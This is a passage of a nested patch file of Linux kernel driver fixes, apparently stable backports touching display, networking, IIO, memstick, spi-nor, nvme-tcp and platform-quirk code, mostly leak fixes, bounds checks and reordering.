+@@ -222,7 +222,7 @@ struct _vcs_dpi_ip_params_st dcn3_15_ip = {
+ 	.maximum_dsc_bits_per_component = 10,
+ 	.dsc422_native_support = false,
+ 	.is_line_buffer_bpp_fixed = true,
+-	.line_buffer_fixed_bpp = 49,
++	.line_buffer_fixed_bpp = 48,
+ 	.line_buffer_size_bits = 789504,
+ 	.max_line_buffer_lines = 12,
+ 	.writeback_interface_buffer_size_kbytes = 90,
+diff --git a/drivers/gpu/drm/drm_buddy.c b/drivers/gpu/drm/drm_buddy.c
+index 3d1f50f481cfd..7098f125b54a9 100644
+--- a/drivers/gpu/drm/drm_buddy.c
++++ b/drivers/gpu/drm/drm_buddy.c
+@@ -146,8 +146,8 @@ int drm_buddy_init(struct drm_buddy *mm, u64 size, u64 chunk_size)
+ 		unsigned int order;
+ 		u64 root_size;
+ 
+-		root_size = rounddown_pow_of_two(size);
+-		order = ilog2(root_size) - ilog2(chunk_size);
++		order = ilog2(size) - ilog2(chunk_size);
++		root_size = chunk_size << order;
+ 
+ 		root = drm_block_alloc(mm, NULL, order, offset);
+ 		if (!root)
+diff --git a/drivers/gpu/drm/i915/display/intel_dp_aux.c b/drivers/gpu/drm/i915/display/intel_dp_aux.c
+index 48c375c65a418..7f3f2d50e6cde 100644
+--- a/drivers/gpu/drm/i915/display/intel_dp_aux.c
++++ b/drivers/gpu/drm/i915/display/intel_dp_aux.c
+@@ -165,7 +165,7 @@ static u32 skl_get_aux_send_ctl(struct intel_dp *intel_dp,
+ 	      DP_AUX_CH_CTL_TIME_OUT_MAX |
+ 	      DP_AUX_CH_CTL_RECEIVE_ERROR |
+ 	      (send_bytes << DP_AUX_CH_CTL_MESSAGE_SIZE_SHIFT) |
+-	      DP_AUX_CH_CTL_FW_SYNC_PULSE_SKL(32) |
++	      DP_AUX_CH_CTL_FW_SYNC_PULSE_SKL(24) |
+ 	      DP_AUX_CH_CTL_SYNC_PULSE_SKL(32);
+ 
+ 	if (intel_tc_port_in_tbt_alt_mode(dig_port))
+diff --git a/drivers/gpu/drm/rockchip/rockchip_drm_vop2.c b/drivers/gpu/drm/rockchip/rockchip_drm_vop2.c
+index 8cecf81a5ae03..3c05ce01f73b8 100644
+--- a/drivers/gpu/drm/rockchip/rockchip_drm_vop2.c
++++ b/drivers/gpu/drm/rockchip/rockchip_drm_vop2.c
+@@ -840,6 +840,8 @@ static void vop2_enable(struct vop2 *vop2)
+ 		return;
+ 	}
+ 
++	regcache_sync(vop2->map);
++
+ 	if (vop2->data->soc_id == 3566)
+ 		vop2_writel(vop2, RK3568_OTP_WIN_EN, 1);
+ 
+@@ -868,6 +870,8 @@ static void vop2_disable(struct vop2 *vop2)
+ 
+ 	pm_runtime_put_sync(vop2->dev);
+ 
++	regcache_mark_dirty(vop2->map);
++
+ 	clk_disable_unprepare(vop2->aclk);
+ 	clk_disable_unprepare(vop2->hclk);
+ }
+diff --git a/drivers/gpu/drm/tests/drm_buddy_test.c b/drivers/gpu/drm/tests/drm_buddy_test.c
+index 62f69589a72d3..a699fc0dc8579 100644
+--- a/drivers/gpu/drm/tests/drm_buddy_test.c
++++ b/drivers/gpu/drm/tests/drm_buddy_test.c
+@@ -89,7 +89,8 @@ static int check_block(struct kunit *test, struct drm_buddy *mm,
+ 		err = -EINVAL;
+ 	}
+ 
+-	if (!is_power_of_2(block_size)) {
++	/* We can't use is_power_of_2() for a u64 on 32-bit systems. */
++	if (block_size & (block_size - 1)) {
+ 		kunit_err(test, "block size not power of two\n");
+ 		err = -EINVAL;
+ 	}
+diff --git a/drivers/iio/adc/at91-sama5d2_adc.c b/drivers/iio/adc/at91-sama5d2_adc.c
+index 870f4cb609237..3ad5678f26135 100644
+--- a/drivers/iio/adc/at91-sama5d2_adc.c
++++ b/drivers/iio/adc/at91-sama5d2_adc.c
+@@ -1409,7 +1409,7 @@ static struct iio_trigger *at91_adc_allocate_trigger(struct iio_dev *indio,
+ 	trig = devm_iio_trigger_alloc(&indio->dev, "%s-dev%d-%s", indio->name,
+ 				iio_device_id(indio), trigger_name);
+ 	if (!trig)
+-		return NULL;
++		return ERR_PTR(-ENOMEM);
+ 
+ 	trig->dev.parent = indio->dev.parent;
+ 	iio_trigger_set_drvdata(trig, indio);
+diff --git a/drivers/iio/dac/ad5755.c b/drivers/iio/dac/ad5755.c
+index beadfa938d2da..404865e354602 100644
+--- a/drivers/iio/dac/ad5755.c
++++ b/drivers/iio/dac/ad5755.c
+@@ -802,6 +802,7 @@ static struct ad5755_platform_data *ad5755_parse_fw(struct device *dev)
+ 	return pdata;
+ 
+  error_out:
++	fwnode_handle_put(pp);
+ 	devm_kfree(dev, pdata);
+ 	return NULL;
+ }
+diff --git a/drivers/iio/light/tsl2772.c b/drivers/iio/light/tsl2772.c
+index dd9051f1cc1a0..13a6c3d078616 100644
+--- a/drivers/iio/light/tsl2772.c
++++ b/drivers/iio/light/tsl2772.c
+@@ -601,6 +601,7 @@ static int tsl2772_read_prox_diodes(struct tsl2772_chip *chip)
+ 			return -EINVAL;
+ 		}
+ 	}
++	chip->settings.prox_diode = prox_diode_mask;
+ 
+ 	return 0;
+ }
+diff --git a/drivers/input/tablet/pegasus_notetaker.c b/drivers/input/tablet/pegasus_notetaker.c
+index d836d3dcc6a24..a68da2988f9cd 100644
+--- a/drivers/input/tablet/pegasus_notetaker.c
++++ b/drivers/input/tablet/pegasus_notetaker.c
+@@ -296,6 +296,12 @@ static int pegasus_probe(struct usb_interface *intf,
+ 	pegasus->intf = intf;
+ 
+ 	pipe = usb_rcvintpipe(dev, endpoint->bEndpointAddress);
++	/* Sanity check that pipe's type matches endpoint's type */
++	if (usb_pipe_type_check(dev, pipe)) {
++		error = -EINVAL;
++		goto err_free_mem;
++	}
++
+ 	pegasus->data_len = usb_maxpacket(dev, pipe);
+ 
+ 	pegasus->data = usb_alloc_coherent(dev, pegasus->data_len, GFP_KERNEL,
+diff --git a/drivers/memstick/core/memstick.c b/drivers/memstick/core/memstick.c
+index 660df7d269fac..d410e2e78a3d3 100644
+--- a/drivers/memstick/core/memstick.c
++++ b/drivers/memstick/core/memstick.c
+@@ -410,6 +410,7 @@ static struct memstick_dev *memstick_alloc_card(struct memstick_host *host)
+ 	return card;
+ err_out:
+ 	host->card = old_card;
++	kfree_const(card->dev.kobj.name);
+ 	kfree(card);
+ 	return NULL;
+ }
+@@ -468,8 +469,10 @@ static void memstick_check(struct work_struct *work)
+ 				put_device(&card->dev);
+ 				host->card = NULL;
+ 			}
+-		} else
++		} else {
++			kfree_const(card->dev.kobj.name);
+ 			kfree(card);
++		}
+ 	}
+ 
+ out_power_off:
+diff --git a/drivers/mmc/host/sdhci_am654.c b/drivers/mmc/host/sdhci_am654.c
+index 101581d83982a..8e22b375247ef 100644
+--- a/drivers/mmc/host/sdhci_am654.c
++++ b/drivers/mmc/host/sdhci_am654.c
+@@ -351,8 +351,6 @@ static void sdhci_am654_write_b(struct sdhci_host *host, u8 val, int reg)
+ 		 */
+ 		case MMC_TIMING_SD_HS:
+ 		case MMC_TIMING_MMC_HS:
+-		case MMC_TIMING_UHS_SDR12:
+-		case MMC_TIMING_UHS_SDR25:
+ 			val &= ~SDHCI_CTRL_HISPD;
+ 		}
+ 	}
+diff --git a/drivers/mtd/spi-nor/core.c b/drivers/mtd/spi-nor/core.c
+index cda57cb863089..75e694791d8d9 100644
+--- a/drivers/mtd/spi-nor/core.c
++++ b/drivers/mtd/spi-nor/core.c
+@@ -3272,7 +3272,19 @@ static struct spi_mem_driver spi_nor_driver = {
+ 	.remove = spi_nor_remove,
+ 	.shutdown = spi_nor_shutdown,
+ };
+-module_spi_mem_driver(spi_nor_driver);
++
++static int __init spi_nor_module_init(void)
++{
++	return spi_mem_driver_register(&spi_nor_driver);
++}
++module_init(spi_nor_module_init);
++
++static void __exit spi_nor_module_exit(void)
++{
++	spi_mem_driver_unregister(&spi_nor_driver);
++	spi_nor_debugfs_shutdown();
++}
++module_exit(spi_nor_module_exit);
+ 
+ MODULE_LICENSE("GPL v2");
+ MODULE_AUTHOR("Huang Shijie <shijie8@gmail.com>");
+diff --git a/drivers/mtd/spi-nor/core.h b/drivers/mtd/spi-nor/core.h
+index d18dafeb020ab..00bf0d0e955a0 100644
+--- a/drivers/mtd/spi-nor/core.h
++++ b/drivers/mtd/spi-nor/core.h
+@@ -709,8 +709,10 @@ static inline struct spi_nor *mtd_to_spi_nor(struct mtd_info *mtd)
+ 
+ #ifdef CONFIG_DEBUG_FS
+ void spi_nor_debugfs_register(struct spi_nor *nor);
++void spi_nor_debugfs_shutdown(void);
+ #else
+ static inline void spi_nor_debugfs_register(struct spi_nor *nor) {}
++static inline void spi_nor_debugfs_shutdown(void) {}
+ #endif
+ 
+ #endif /* __LINUX_MTD_SPI_NOR_INTERNAL_H */
+diff --git a/drivers/mtd/spi-nor/debugfs.c b/drivers/mtd/spi-nor/debugfs.c
+index df76cb5de3f93..5f56b23205d8b 100644
+--- a/drivers/mtd/spi-nor/debugfs.c
++++ b/drivers/mtd/spi-nor/debugfs.c
+@@ -226,13 +226,13 @@ static void spi_nor_debugfs_unregister(void *data)
+ 	nor->debugfs_root = NULL;
+ }
+ 
++static struct dentry *rootdir;
++
+ void spi_nor_debugfs_register(struct spi_nor *nor)
+ {
+-	struct dentry *rootdir, *d;
++	struct dentry *d;
+ 	int ret;
+ 
+-	/* Create rootdir once. Will never be deleted again. */
+-	rootdir = debugfs_lookup(SPI_NOR_DEBUGFS_ROOT, NULL);
+ 	if (!rootdir)
+ 		rootdir = debugfs_create_dir(SPI_NOR_DEBUGFS_ROOT, NULL);
+ 
+@@ -247,3 +247,8 @@ void spi_nor_debugfs_register(struct spi_nor *nor)
+ 	debugfs_create_file("capabilities", 0444, d, nor,
+ 			    &spi_nor_capabilities_fops);
+ }
++
++void spi_nor_debugfs_shutdown(void)
++{
++	debugfs_remove(rootdir);
++}
+diff --git a/drivers/net/bonding/bond_main.c b/drivers/net/bonding/bond_main.c
+index 9f6824a6537bc..9f44c86a591dd 100644
+--- a/drivers/net/bonding/bond_main.c
++++ b/drivers/net/bonding/bond_main.c
+@@ -1776,14 +1776,15 @@ void bond_lower_state_changed(struct slave *slave)
+ 
+ /* The bonding driver uses ether_setup() to convert a master bond device
+  * to ARPHRD_ETHER, that resets the target netdevice's flags so we always
+- * have to restore the IFF_MASTER flag, and only restore IFF_SLAVE if it was set
++ * have to restore the IFF_MASTER flag, and only restore IFF_SLAVE and IFF_UP
++ * if they were set
+  */
+ static void bond_ether_setup(struct net_device *bond_dev)
+ {
+-	unsigned int slave_flag = bond_dev->flags & IFF_SLAVE;
++	unsigned int flags = bond_dev->flags & (IFF_SLAVE | IFF_UP);
+ 
+ 	ether_setup(bond_dev);
+-	bond_dev->flags |= IFF_MASTER | slave_flag;
++	bond_dev->flags |= IFF_MASTER | flags;
+ 	bond_dev->priv_flags &= ~IFF_TX_SKB_SHARING;
+ }
+ 
+diff --git a/drivers/net/dsa/b53/b53_mmap.c b/drivers/net/dsa/b53/b53_mmap.c
+index 70887e0aece33..d9434ed9450df 100644
+--- a/drivers/net/dsa/b53/b53_mmap.c
++++ b/drivers/net/dsa/b53/b53_mmap.c
+@@ -216,6 +216,18 @@ static int b53_mmap_write64(struct b53_device *dev, u8 page, u8 reg,
+ 	return 0;
+ }
+ 
++static int b53_mmap_phy_read16(struct b53_device *dev, int addr, int reg,
++			       u16 *value)
++{
++	return -EIO;
++}
++
++static int b53_mmap_phy_write16(struct b53_device *dev, int addr, int reg,
++				u16 value)
++{
++	return -EIO;
++}
++
+ static const struct b53_io_ops b53_mmap_ops = {
+ 	.read8 = b53_mmap_read8,
+ 	.read16 = b53_mmap_read16,
+@@ -227,6 +239,8 @@ static const struct b53_io_ops b53_mmap_ops = {
+ 	.write32 = b53_mmap_write32,
+ 	.write48 = b53_mmap_write48,
+ 	.write64 = b53_mmap_write64,
++	.phy_read16 = b53_mmap_phy_read16,
++	.phy_write16 = b53_mmap_phy_write16,
+ };
+ 
+ static int b53_mmap_probe_of(struct platform_device *pdev,
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt.c b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+index c6e36603bd2db..e3e5a427222f6 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+@@ -7597,7 +7597,7 @@ static int __bnxt_hwrm_ptp_qcfg(struct bnxt *bp)
+ 	u8 flags;
+ 	int rc;
+ 
+-	if (bp->hwrm_spec_code < 0x10801) {
++	if (bp->hwrm_spec_code < 0x10801 || !BNXT_CHIP_P5_THOR(bp)) {
+ 		rc = -ENODEV;
+ 		goto no_ptp;
+ 	}
+diff --git a/drivers/net/ethernet/intel/e1000e/netdev.c b/drivers/net/ethernet/intel/e1000e/netdev.c
+index 55cf2f62bb308..db8e06157da29 100644
+--- a/drivers/net/ethernet/intel/e1000e/netdev.c
++++ b/drivers/net/ethernet/intel/e1000e/netdev.c
+@@ -5293,31 +5293,6 @@ static void e1000_watchdog_task(struct work_struct *work)
+ 				ew32(TARC(0), tarc0);
+ 			}
+ 
+-			/* disable TSO for pcie and 10/100 speeds, to avoid
+-			 * some hardware issues
+-			 */
+-			if (!(adapter->flags & FLAG_TSO_FORCE)) {
+-				switch (adapter->link_speed) {
+-				case SPEED_10:
+-				case SPEED_100:
+-					e_info("10/100 speed: disabling TSO\n");
+-					netdev->features &= ~NETIF_F_TSO;
+-					netdev->features &= ~NETIF_F_TSO6;
+-					break;
+-				case SPEED_1000:
+-					netdev->features |= NETIF_F_TSO;
+-					netdev->features |= NETIF_F_TSO6;
+-					break;
+-				default:
+-					/* oops */
+-					break;
+-				}
+-				if (hw->mac.type == e1000_pch_spt) {
+-					netdev->features &= ~NETIF_F_TSO;
+-					netdev->features &= ~NETIF_F_TSO6;
+-				}
+-			}
+-
+ 			/* enable transmits in the hardware, need to do this
+ 			 * after setting TARC(0)
+ 			 */
+@@ -7532,6 +7507,32 @@ static int e1000_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 			    NETIF_F_RXCSUM |
+ 			    NETIF_F_HW_CSUM);
+ 
++	/* disable TSO for pcie and 10/100 speeds to avoid
++	 * some hardware issues and for i219 to fix transfer
++	 * speed being capped at 60%
++	 */
++	if (!(adapter->flags & FLAG_TSO_FORCE)) {
++		switch (adapter->link_speed) {
++		case SPEED_10:
++		case SPEED_100:
++			e_info("10/100 speed: disabling TSO\n");
++			netdev->features &= ~NETIF_F_TSO;
++			netdev->features &= ~NETIF_F_TSO6;
++			break;
++		case SPEED_1000:
++			netdev->features |= NETIF_F_TSO;
++			netdev->features |= NETIF_F_TSO6;
++			break;
++		default:
++			/* oops */
++			break;
++		}
++		if (hw->mac.type == e1000_pch_spt) {
++			netdev->features &= ~NETIF_F_TSO;
++			netdev->features &= ~NETIF_F_TSO6;
++		}
++	}
++
+ 	/* Set user-changeable features (subset of all device features) */
+ 	netdev->hw_features = netdev->features;
+ 	netdev->hw_features |= NETIF_F_RXFCS;
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_main.c b/drivers/net/ethernet/intel/i40e/i40e_main.c
+index da0cf87d3a1ca..68f390ce4f6e2 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_main.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_main.c
+@@ -11058,8 +11058,11 @@ static void i40e_rebuild(struct i40e_pf *pf, bool reinit, bool lock_acquired)
+ 					     pf->hw.aq.asq_last_status));
+ 	}
+ 	/* reinit the misc interrupt */
+-	if (pf->flags & I40E_FLAG_MSIX_ENABLED)
++	if (pf->flags & I40E_FLAG_MSIX_ENABLED) {
+ 		ret = i40e_setup_misc_vector(pf);
++		if (ret)
++			goto end_unlock;
++	}
+ 
+ 	/* Add a filter to drop all Flow control frames from any VSI from being
+ 	 * transmitted. By doing so we stop a malicious VF from sending out
+@@ -14098,15 +14101,15 @@ static int i40e_add_vsi(struct i40e_vsi *vsi)
+ 		vsi->id = ctxt.vsi_number;
+ 	}
+ 
+-	vsi->active_filters = 0;
+-	clear_bit(__I40E_VSI_OVERFLOW_PROMISC, vsi->state);
+ 	spin_lock_bh(&vsi->mac_filter_hash_lock);
++	vsi->active_filters = 0;
+ 	/* If macvlan filters already exist, force them to get loaded */
+ 	hash_for_each_safe(vsi->mac_filter_hash, bkt, h, f, hlist) {
+ 		f->state = I40E_FILTER_NEW;
+ 		f_count++;
+ 	}
+ 	spin_unlock_bh(&vsi->mac_filter_hash_lock);
++	clear_bit(__I40E_VSI_OVERFLOW_PROMISC, vsi->state);
+ 
+ 	if (f_count) {
+ 		vsi->flags |= I40E_VSI_FLAG_FILTER_CHANGED;
+diff --git a/drivers/net/ethernet/mellanox/mlxfw/mlxfw_mfa2_tlv_multi.c b/drivers/net/ethernet/mellanox/mlxfw/mlxfw_mfa2_tlv_multi.c
+index 017d68f1e1232..972c571b41587 100644
+--- a/drivers/net/ethernet/mellanox/mlxfw/mlxfw_mfa2_tlv_multi.c
++++ b/drivers/net/ethernet/mellanox/mlxfw/mlxfw_mfa2_tlv_multi.c
+@@ -31,6 +31,8 @@ mlxfw_mfa2_tlv_next(const struct mlxfw_mfa2_file *mfa2_file,
+ 
+ 	if (tlv->type == MLXFW_MFA2_TLV_MULTI_PART) {
+ 		multi = mlxfw_mfa2_tlv_multi_get(mfa2_file, tlv);
++		if (!multi)
++			return NULL;
+ 		tlv_len = NLA_ALIGN(tlv_len + be16_to_cpu(multi->total_len));
+ 	}
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/pci_hw.h b/drivers/net/ethernet/mellanox/mlxsw/pci_hw.h
+index 48dbfea0a2a1d..7cdf0ce24f288 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/pci_hw.h
++++ b/drivers/net/ethernet/mellanox/mlxsw/pci_hw.h
+@@ -26,7 +26,7 @@
+ #define MLXSW_PCI_CIR_TIMEOUT_MSECS		1000
+ 
+ #define MLXSW_PCI_SW_RESET_TIMEOUT_MSECS	900000
+-#define MLXSW_PCI_SW_RESET_WAIT_MSECS		200
++#define MLXSW_PCI_SW_RESET_WAIT_MSECS		400
+ #define MLXSW_PCI_FW_READY			0xA1844
+ #define MLXSW_PCI_FW_READY_MASK			0xFFFF
+ #define MLXSW_PCI_FW_READY_MAGIC		0x5E
+diff --git a/drivers/net/ethernet/sfc/efx.c b/drivers/net/ethernet/sfc/efx.c
+index 6a1bff54bc6c3..e6aedd8ebd750 100644
+--- a/drivers/net/ethernet/sfc/efx.c
++++ b/drivers/net/ethernet/sfc/efx.c
+@@ -541,7 +541,6 @@ int efx_net_open(struct net_device *net_dev)
+ 	else
+ 		efx->state = STATE_NET_UP;
+ 
+-	efx_selftest_async_start(efx);
+ 	return 0;
+ }
+ 
+diff --git a/drivers/net/ethernet/sfc/efx_common.c b/drivers/net/ethernet/sfc/efx_common.c
+index c2224e41a694d..ee1cabe3e2429 100644
+--- a/drivers/net/ethernet/sfc/efx_common.c
++++ b/drivers/net/ethernet/sfc/efx_common.c
+@@ -544,6 +544,8 @@ void efx_start_all(struct efx_nic *efx)
+ 	/* Start the hardware monitor if there is one */
+ 	efx_start_monitor(efx);
+ 
++	efx_selftest_async_start(efx);
++
+ 	/* Link state detection is normally event-driven; we have
+ 	 * to poll now because we could have missed a change
+ 	 */
+diff --git a/drivers/net/virtio_net.c b/drivers/net/virtio_net.c
+index 20b1b34a092ad..3f1883814ce21 100644
+--- a/drivers/net/virtio_net.c
++++ b/drivers/net/virtio_net.c
+@@ -724,8 +724,13 @@ static struct page *xdp_linearize_page(struct receive_queue *rq,
+ 				       int page_off,
+ 				       unsigned int *len)
+ {
+-	struct page *page = alloc_page(GFP_ATOMIC);
++	int tailroom = SKB_DATA_ALIGN(sizeof(struct skb_shared_info));
++	struct page *page;
+ 
++	if (page_off + *len + tailroom > PAGE_SIZE)
++		return NULL;
++
++	page = alloc_page(GFP_ATOMIC);
+ 	if (!page)
+ 		return NULL;
+ 
+@@ -733,7 +738,6 @@ static struct page *xdp_linearize_page(struct receive_queue *rq,
+ 	page_off += *len;
+ 
+ 	while (--*num_buf) {
+-		int tailroom = SKB_DATA_ALIGN(sizeof(struct skb_shared_info));
+ 		unsigned int buflen;
+ 		void *buf;
+ 		int off;
+diff --git a/drivers/net/xen-netback/netback.c b/drivers/net/xen-netback/netback.c
+index 5c266062c08f0..c35c085dbc877 100644
+--- a/drivers/net/xen-netback/netback.c
++++ b/drivers/net/xen-netback/netback.c
+@@ -996,10 +996,8 @@ static void xenvif_tx_build_gops(struct xenvif_queue *queue,
+ 
+ 		/* No crossing a page as the payload mustn't fragment. */
+ 		if (unlikely((txreq.offset + txreq.size) > XEN_PAGE_SIZE)) {
+-			netdev_err(queue->vif->dev,
+-				   "txreq.offset: %u, size: %u, end: %lu\n",
+-				   txreq.offset, txreq.size,
+-				   (unsigned long)(txreq.offset&~XEN_PAGE_MASK) + txreq.size);
++			netdev_err(queue->vif->dev, "Cross page boundary, txreq.offset: %u, size: %u\n",
++				   txreq.offset, txreq.size);
+ 			xenvif_fatal_tx_err(queue->vif);
+ 			break;
+ 		}
+diff --git a/drivers/nvme/host/tcp.c b/drivers/nvme/host/tcp.c
+index bb80192c16b6b..8f17cbec5a0e4 100644
+--- a/drivers/nvme/host/tcp.c
++++ b/drivers/nvme/host/tcp.c
+@@ -1604,22 +1604,7 @@ static int nvme_tcp_alloc_queue(struct nvme_ctrl *nctrl, int qid)
+ 	if (ret)
+ 		goto err_init_connect;
+ 
+-	queue->rd_enabled = true;
+ 	set_bit(NVME_TCP_Q_ALLOCATED, &queue->flags);
+-	nvme_tcp_init_recv_ctx(queue);
+-
+-	write_lock_bh(&queue->sock->sk->sk_callback_lock);
+-	queue->sock->sk->sk_user_data = queue;
+-	queue->state_change = queue->sock->sk->sk_state_change;
+-	queue->data_ready = queue->sock->sk->sk_data_ready;
+-	queue->write_space = queue->sock->sk->sk_write_space;
+-	queue->sock->sk->sk_data_ready = nvme_tcp_data_ready;
+-	queue->sock->sk->sk_state_change = nvme_tcp_state_change;
+-	queue->sock->sk->sk_write_space = nvme_tcp_write_space;
+-#ifdef CONFIG_NET_RX_BUSY_POLL
+-	queue->sock->sk->sk_ll_usec = 1;
+-#endif
+-	write_unlock_bh(&queue->sock->sk->sk_callback_lock);
+ 
+ 	return 0;
+ 
+@@ -1639,7 +1624,7 @@ err_destroy_mutex:
+ 	return ret;
+ }
+ 
+-static void nvme_tcp_restore_sock_calls(struct nvme_tcp_queue *queue)
++static void nvme_tcp_restore_sock_ops(struct nvme_tcp_queue *queue)
+ {
+ 	struct socket *sock = queue->sock;
+ 
+@@ -1654,7 +1639,7 @@ static void nvme_tcp_restore_sock_calls(struct nvme_tcp_queue *queue)
+ static void __nvme_tcp_stop_queue(struct nvme_tcp_queue *queue)
+ {
+ 	kernel_sock_shutdown(queue->sock, SHUT_RDWR);
+-	nvme_tcp_restore_sock_calls(queue);
++	nvme_tcp_restore_sock_ops(queue);
+ 	cancel_work_sync(&queue->io_work);
+ }
+ 
+@@ -1672,21 +1657,42 @@ static void nvme_tcp_stop_queue(struct nvme_ctrl *nctrl, int qid)
+ 	mutex_unlock(&queue->queue_lock);
+ }
+ 
++static void nvme_tcp_setup_sock_ops(struct nvme_tcp_queue *queue)
++{
++	write_lock_bh(&queue->sock->sk->sk_callback_lock);
++	queue->sock->sk->sk_user_data = queue;
++	queue->state_change = queue->sock->sk->sk_state_change;
++	queue->data_ready = queue->sock->sk->sk_data_ready;
++	queue->write_space = queue->sock->sk->sk_write_space;
++	queue->sock->sk->sk_data_ready = nvme_tcp_data_ready;
++	queue->sock->sk->sk_state_change = nvme_tcp_state_change;
++	queue->sock->sk->sk_write_space = nvme_tcp_write_space;
++#ifdef CONFIG_NET_RX_BUSY_POLL
++	queue->sock->sk->sk_ll_usec = 1;
++#endif
++	write_unlock_bh(&queue->sock->sk->sk_callback_lock);
++}
++
+ static int nvme_tcp_start_queue(struct nvme_ctrl *nctrl, int idx)
+ {
+ 	struct nvme_tcp_ctrl *ctrl = to_tcp_ctrl(nctrl);
++	struct nvme_tcp_queue *queue = &ctrl->queues[idx];
+ 	int ret;
+ 
++	queue->rd_enabled = true;
++	nvme_tcp_init_recv_ctx(queue);
++	nvme_tcp_setup_sock_ops(queue);
++
+ 	if (idx)
+ 		ret = nvmf_connect_io_queue(nctrl, idx);
+ 	else
+ 		ret = nvmf_connect_admin_queue(nctrl);
+ 
+ 	if (!ret) {
+-		set_bit(NVME_TCP_Q_LIVE, &ctrl->queues[idx].flags);
++		set_bit(NVME_TCP_Q_LIVE, &queue->flags);
+ 	} else {
+-		if (test_bit(NVME_TCP_Q_ALLOCATED, &ctrl->queues[idx].flags))
+-			__nvme_tcp_stop_queue(&ctrl->queues[idx]);
++		if (test_bit(NVME_TCP_Q_ALLOCATED, &queue->flags))
++			__nvme_tcp_stop_queue(queue);
+ 		dev_err(nctrl->device,
+ 			"failed to connect queue: %d ret=%d\n", idx, ret);
+ 	}
+diff --git a/drivers/platform/x86/asus-nb-wmi.c b/drivers/platform/x86/asus-nb-wmi.c
+index cb15acdf14a30..e2c9a68d12df9 100644
+--- a/drivers/platform/x86/asus-nb-wmi.c
++++ b/drivers/platform/x86/asus-nb-wmi.c
+@@ -464,7 +464,8 @@ static const struct dmi_system_id asus_quirks[] = {
+ 		.ident = "ASUS ROG FLOW X13",
+ 		.matches = {
+ 			DMI_MATCH(DMI_SYS_VENDOR, "ASUSTeK COMPUTER INC."),
+-			DMI_MATCH(DMI_PRODUCT_NAME, "GV301Q"),
++			/* Match GV301** */
++			DMI_MATCH(DMI_PRODUCT_NAME, "GV301"),
+ 		},
+ 		.driver_data = &quirk_asus_tablet_mode,
+ 	},
+diff --git a/drivers/platform/x86/gigabyte-wmi.c b/drivers/platform/x86/gigabyte-wmi.c
+index 322cfaeda17ba..2a426040f749e 100644
+--- a/drivers/platform/x86/gigabyte-wmi.c
++++ b/drivers/platform/x86/gigabyte-wmi.c
+@@ -140,6 +140,7 @@ static u8 gigabyte_wmi_detect_sensor_usability(struct wmi_device *wdev)
+ 	}}
+ 
+ static const struct dmi_system_id gigabyte_wmi_known_working_platforms[] = {
++	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("A320M-S2H V2-CF"),
+ 	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("B450M DS3H-CF"),
+ 	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("B450M DS3H WIFI-CF"),
+ 	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("B450M S2H V2"),
+@@ -150,6 +151,7 @@ static const struct dmi_system_id gigabyte_wmi_known_working_platforms[] = {
+ 	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("B550I AORUS PRO AX"),
+ 	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("B550M AORUS PRO-P"),
+ 	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("B550M DS3H"),
++	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("B650 AORUS ELITE AX"),
+ 	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("B660 GAMING X DDR4"),
+ 	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("B660I AORUS PRO DDR4"),
+ 	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("Z390 I AORUS PRO WIFI-CF"),
+@@ -159,6 +161,7 @@ static const struct dmi_system_id gigabyte_wmi_known_working_platforms[] = {
+ 	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("X570 GAMING X"),
+ 	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("X570 I AORUS PRO WIFI"),
+ 	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("X570 UD"),
++	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("X570S AORUS ELITE"),
+ 	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("Z690M AORUS ELITE AX DDR4"),
+ 	{ }
+ };
+diff --git a/drivers/platform/x86/intel/vsec.c b/drivers/platform/x86/intel/vsec.c
+index bb81b8b1f7e9b..483bb65651665 100644
+--- a/drivers/platform/x86/intel/vsec.c
++++ b/drivers/platform/x86/intel/vsec.c
+@@ -141,6 +141,7 @@ static int intel_vsec_add_aux(struct pci_dev *pdev, struct intel_vsec_device *in
+ 
+ 	ret = ida_alloc(intel_vsec_dev->ida, GFP_KERNEL);
+ 	if (ret < 0) {
++		kfree(intel_vsec_dev->resource);
+ 		kfree(intel_vsec_dev);
+ 		return ret;
+ 	}
+diff --git a/drivers/regulator/fan53555.c b/drivers/regulator/fan53555.c
+index dac1fb584fa35..ecd5a50c61660 100644
+--- a/drivers/regulator/fan53555.c
++++ b/drivers/regulator/fan53555.c
+@@ -8,18 +8,19 @@
+ // Copyright (c) 2012 Marvell Technology Ltd.
+ // Yunfan Zhang <yfzhang@marvell.com>
+ 
++#include <linux/bits.h>
++#include <linux/err.h>
++#include <linux/i2c.h>
+ #include <linux/module.h>
++#include <linux/of_device.h>
+ #include <linux/param.h>
+-#include <linux/err.h>
+ #include <linux/platform_device.h>
++#include <linux/regmap.h>
+ #include <linux/regulator/driver.h>
++#include <linux/regulator/fan53555.h>
+ #include <linux/regulator/machine.h>
+ #include <linux/regulator/of_regulator.h>
+-#include <linux/of_device.h>
+-#include <linux/i2c.h>
+ #include <linux/slab.h>
+-#include <linux/regmap.h>
+-#include <linux/regulator/fan53555.h>
+ 
+ /* Voltage setting */
+ #define FAN53555_VSEL0		0x00
+@@ -60,7 +61,7 @@
+ #define TCS_VSEL1_MODE		(1 << 6)
+ 
+ #define TCS_SLEW_SHIFT		3
